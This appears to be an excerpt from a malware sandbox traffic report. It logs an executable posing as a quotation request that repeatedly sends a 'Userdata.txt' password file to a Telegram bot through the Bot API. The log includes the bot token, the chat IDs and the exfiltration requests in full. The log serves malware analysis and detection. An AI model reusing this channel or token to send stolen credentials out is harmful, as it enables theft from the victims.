                                                                                                                              2024-12-03 14:23:01 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 37 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":980,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235781,"document":{"file_nam


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.749844149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:23:05 UTC299OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd13bb6da2d893
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-03 14:23:05 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 33 62 62 36 64 61 32 64 38 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd13bb6da2d893Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:23:06 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:06 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 545
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-03 14:23:06 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 37 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":981,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235786,"document":{"file_nam


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.749852149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:23:09 UTC275OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd13e4e12a7243
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              2024-12-03 14:23:09 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 33 65 34 65 31 32 61 37 32 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd13e4e12a7243Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:23:10 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:09 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 544
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-03 14:23:10 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 37 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":982,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235789,"document":{"file_nam


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.749863149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:23:13 UTC275OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd1412303aa220
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              2024-12-03 14:23:13 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 34 31 32 33 30 33 61 61 32 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd1412303aa220Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:23:13 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:13 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 544
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-03 14:23:13 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 37 39 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":983,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235793,"document":{"file_nam


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.749875149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:23:17 UTC275OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd143ddb19b669
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              2024-12-03 14:23:17 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 34 33 64 64 62 31 39 62 36 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd143ddb19b669Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:23:17 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:17 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 544
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-03 14:23:17 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 37 39 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":984,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235797,"document":{"file_nam


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.2.749883149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:23:21 UTC275OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd147412cdacdf
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              2024-12-03 14:23:21 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 34 37 34 31 32 63 64 61 63 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd147412cdacdfContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:23:21 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:21 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 544
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-03 14:23:21 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 38 30 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":985,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235801,"document":{"file_nam


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              9192.168.2.749894149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:23:24 UTC275OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd14a1d614b40e
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              2024-12-03 14:23:24 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 34 61 31 64 36 31 34 62 34 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd14a1d614b40eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:23:25 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:25 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 544
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-03 14:23:25 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 38 30 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":986,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235805,"document":{"file_nam


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              10192.168.2.749903149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:23:28 UTC275OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd14cdf870ea02
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              2024-12-03 14:23:28 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 34 63 64 66 38 37 30 65 61 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd14cdf870ea02Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:23:29 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:29 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 544
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
